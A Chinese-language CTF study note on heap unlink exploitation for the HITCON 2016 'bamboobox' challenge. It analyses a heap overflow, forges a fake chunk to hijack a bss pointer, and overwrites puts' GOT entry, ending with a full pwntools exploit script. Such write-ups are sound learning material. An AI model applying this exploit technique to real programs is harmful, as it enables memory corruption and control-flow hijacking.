【PWN-HEAP】Unlink学习笔记

题目练习

HITCON2016 bamboobox

反编译情况:

【PWN-HEAP】Unlink学习笔记_第1张图片【PWN-HEAP】Unlink学习笔记_第2张图片
【PWN-HEAP】Unlink学习笔记_第3张图片【PWN-HEAP】Unlink学习笔记_第4张图片【PWN-HEAP】Unlink学习笔记_第5张图片【PWN-HEAP】Unlink学习笔记_第6张图片

程序分析

把程序的功能阅读完成之后,发现这个程序用到一个结构体的数组用于管理结构体。
所以整理结构体如下:

struts Node{
   int size;
   char string[size];
}

从下图change_item() 中的代码可以看到,这里先输入一个长度,然后转化成int类型之后作为read读入的长度。
在这里插入图片描述若输入的长度大于malloc出来的长度,则可以造成堆溢出。
这里保存chunk的指针也保存在bss段(从qword_6020C8可以看出来,或者进行动态调试也行)。

EXP编写思路

这里的核心思想是将写数据从heap变成bss,也就是说借助堆溢出伪造fake_chunk->改写人工malloc的第二个chunk头部的inused标志->free( 人工malloc的第二个chunk )来触发unlink操作->改写保存chunk的指针内容为ptr-3*8(改写到了某个函数的got表)->调用该函数 -> 任意地址读写。

首先申请3个0x80大小的chunk,填入任意字符串,之后观察heap的内容:
【PWN-HEAP】Unlink学习笔记_第7张图片
接下来改写Chunk0里面的内容,伪造出一个fake_chunk,顺便溢出改写Chunk1的头部。
【PWN-HEAP】Unlink学习笔记_第8张图片此时ptr指针的内容如下:
【PWN-HEAP】Unlink学习笔记_第9张图片
紧接着Free掉Chunk1,触发unlink,向前(Chunk0)合并,然后这个时候的ptr变成如下内容
【PWN-HEAP】Unlink学习笔记_第10张图片
紧接着往0x6020b0里面填入数据,把0x6020b0~0x6020d0改成如下内容:
【PWN-HEAP】Unlink学习笔记_第11张图片最后一个操作就是UAF的操作,修改Chunk1,实际上就变成了修改0x602020(puts函数的GOT)里面的数据。此时如果改成magic函数的地址,再调用puts函数,实际上就是调用了magic函数。
【PWN-HEAP】Unlink学习笔记_第12张图片【PWN-HEAP】Unlink学习笔记_第13张图片#### 完整EXP:
这里参考网络上公开的EXP,感谢这位大神~

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'
context.terminal = ['terminator','-x','bash','-c']
cn = process('./bamboobox')
bin = ELF('./bamboobox')

itemlist = 0x00000000006020C0
p_chunk0 = itemlist+8

def add_item(length,name):
	cn.sendline('2')
	cn.recvuntil('the length of item name:')
	cn.sendline(str(length))
	cn.recvuntil('the name of item:')
	cn.sendline(name)

def change_item(index,length,name):
	cn.sendline('3')
	cn.recvuntil('the index of item:')
	cn.sendline(str(index))
	cn.recvuntil('the length of item name:')
	cn.sendline(str(length))
	cn.recvuntil('new name of the item:')
	cn.sendline(name)

def remove_item(index):
	cn.sendline('4')
	cn.recvuntil('the index of item:')
	cn.sendline(str(index))

def show_item():
	cn.sendline('1')
	data = cn.recvuntil('----------------------------')
	return data

add_item(256,'aaaaaaaa')#chunk0
add_item(256,'bbbbbbbb')#chunk1
add_item(256,'cccccccc')#chunk2

pay = p64(0)+p64(256+1)+p64(p_chunk0-0x18)+p64(p_chunk0-0x10)
pay += 'A'*(256-4*8)
pay += p64(256)+p64(256+0x10) + 'test'

change_item(0,len(pay),pay)

remove_item(1)

pay2 = '\x00'*0x18 + p64(p_chunk0-0x18) + p64(0) + p64(bin.got['puts'])
change_item(0,len(pay2),pay2)

change_item(1,16,p64(bin.symbols['magic']))
flag = cn.recv()

log.success("the flag is : "+flag)

你可能感兴趣的:(PWN)